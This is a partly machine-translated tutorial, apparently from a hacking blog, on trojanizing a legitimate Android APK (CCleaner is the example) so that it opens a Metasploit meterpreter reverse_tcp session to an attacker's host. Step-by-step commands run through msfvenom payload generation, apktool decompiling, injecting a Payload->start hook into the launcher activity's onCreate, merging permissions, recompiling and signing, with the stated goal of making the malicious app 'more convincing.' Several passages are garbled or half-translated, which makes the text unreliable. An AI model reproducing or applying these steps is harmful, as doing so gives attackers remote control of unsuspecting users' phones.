Make Embbedding Metasploit to the original Android APK

Today you will learn how to make Android APK more convincing by injecting the hook from our payload into the original apk file.

Let's start.

Downloading the original apk file You can get one from.
https://apkpure.com/

Install Perpustakaan jika Anda menjalankan sistem operasi 64-bit untuk menginstal lib32. 

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Now we create playoud

 Now we need to generate our malicious payload.

 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R >

 meterpreter.apk

If you do not know your Lorem, you can check using IFCONFIG

 ifconfig

Now we have our malicious payload which need to Download and install Apktool if running Linux Apktool Kali is already entering OS

https://ibotpeaches.github.io/Apktool/install/

Now is the time to decompile our apk file. Open a new terminal and use the commands below to decompile our apk file to a new location.

(The option d will tell apktool to decompile our apk file, -f is to replace the apk code that has been pre-compiled, -o is the output location we want to decompile our file

apktool d -f -o original /root/[Original_APK_Name] 

apktool d -f -o original /root/meterpreter.apk 

This will decompile the load to "/ root / payload" and the original document to the "/ root / original" directory.

 


Now we need to copy the payload file to the original Apk folder to the "/ root / payload / smali / com / metasploit / stage" directory and copy all payload.smali files. Now paste in "/ root / original / smali / com / metasploit / stage" you need to create a folder for / com / metasploit.

Sekarangkita need to find out what activities will run when the application is launched. Information stored in AndroidManifest.xml file open AndroidManifest.xml from "/ root / original" with your favorite text editor. You'll see Markup Language, and both use familiar tags and attributes. Find the <activity> tag that contains both of these lines You can use CTRL + F to search for lines of code.

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

When you find the activity, the value of the "android: name" attribute. Examples of attributes. '

“com.piriform.ccleaner.ui.activity.MainActivity”.

Now we know the name of the activity we can edit it replaces the [Activity Path] with the "android: name" activity, but instead of the dots, use a slash.

  

gedit /root/original/smali/[Activity_Path]

Now look for the line below.

;→onCreate(Landroid/os/Bundle;)V

When you find it, insert the following code in the line next to it, it will start the load alongside the original apk code side.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content

/Context;)V

 

Now we need to inject the necessary permissions to our apk. "Permission" means a mechanism that imposes restrictions on certain operations that can only be performed by a particular process.

To edit the permissions, we will open /root/payload/AndroidManifest.xml and copy Payload permissions to AndroidManifest, myroro / original / AndroidManifest.xml and save the file to ensure that you have duplicate permissions.

 

Now that we have our permissions set we can now recompile apk we open a new terminal and use the following command to recompile.

apktool b /root/original

Switch / root / original with your apk path.

Now that our apk is compiled we need to sign it is very important because an unsigned apk will not be installed. When we sign a malicious apk file we replace [apk_path] with the path to your apk file.

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android

 -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

If you're using Android, you can also use Zip Signer as a great tool for signing files including zip, and APK.